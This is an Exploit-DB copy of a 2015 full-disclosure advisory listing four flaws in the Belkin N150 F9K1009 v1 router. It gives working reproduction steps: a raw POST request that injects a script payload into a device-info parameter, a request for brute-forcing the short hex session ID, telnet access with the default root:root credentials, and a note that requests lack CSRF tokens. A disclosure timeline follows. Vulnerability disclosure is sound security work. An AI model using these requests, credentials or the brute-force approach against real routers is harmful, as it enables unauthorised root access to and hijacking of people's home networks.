Belkin N150 Wireless Router F9K1009 v1 – Multiple Vulnerabilities

  • 作者: Rahul Pratap Singh
    日期: 2015-12-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38840/
  • ##Full Disclosure:
    
    #Exploit Title: Belkin N150 Wireless Home Router Multiple
    Vulnerabilities
    #Exploit Author : Rahul Pratap Singh
    #Date : 30/Nov/2015
    #Home Page Link : http://www.belkin.com
    #Blog Url : 0x62626262.wordpress.com
    #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
    #Status : Not Patched
    
    → Vulnerability/BUG Report :
    
    1)
    
    • Vulnerability Title:HTML/Script Injection
    • Version:F9K1009 v1
    • Firmware :1.00.09
    
    → Proof of Concept:
    
    "InternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language" this parameter is
    vulnerable.
    
    Belkin N150 Router Multiple Vulnerabilities
    
    → Steps to Reproduce:
    
    Send the following post request using Burpsuite,etc
    
    POST /cgi-bin/webproc HTTP/1.1
    Host: 192.168.2.1
    User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101
    Firefox/35.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Referer:
    http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
    Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 260
    
    %3AInternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language="><script>alert("1")</script><script>"&obj-action=set&var%3Apage=deviceinfo&var%3Aerrorpage=deviceinfo&getpage=html%2Findex.html&errorpage=html%2Findex.html&var%3ACacheLastData=U1BBTl9UaW1lTnVtMT0%3D
    
    2)
    
    • Vulnerability Title:Session Hijacking
    • Version:F9K1009 v1
    • Firmware :1.00.09
    
    → Proof of Concept:
    
    Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
    
    sessionid is allocated using hex encoding and of fixed length i.e 8 .
    Therefore, it is very easy to bruteforce it in feasible amount for time as
    this session id ranges from 00000000 to ffffffff
    
    → Steps to Reproduce:
    
    Send the following request using Burpsuite and Bruteforce the sessionid.
    
    POST /cgi-bin/webproc HTTP/1.1
    Host: 192.168.2.1
    User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101
    Firefox/35.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Referer:
    http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
    Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
    
    3)
    
    • Vulnerability Title:Telnet Enabled with Default Pass
    • Version:F9K1009 v1
    • Firmware :1.00.09
    
    → Vulnerability Details:
    
    Telnet protocol can be used by an attacker to gain remote access to the
    router with root privileges.
    
    → Proof of Concept:
    
    Belkin N150 Router Multiple Vulnerabilities
    
    → Steps to Reproduce:
    
    1) Open terminal
    2) Type following command:
    telnet 192.168.2.1
    3) Default user and pass is root:root
    
    4)
    
    • Vulnerability Title:Cross Site Request Forgery
    • Version:F9K1009 v1
    • Firmware :1.00.09
    
    → Proof of Concept:
    
    Request doesn't contain any CSRF-token. Therefore, requests can be forged.
    It can be verified with any request.
    
    Status:
    Vendor Notified: 20 Oct 2015
    Vendor Notified Again:25 Nov 2015
    
    No Response.
    
    Full Disclosure: 30 Nov 2015
    
    Ref:
    Belkin N150 Router Multiple Vulnerabilities
    
    Python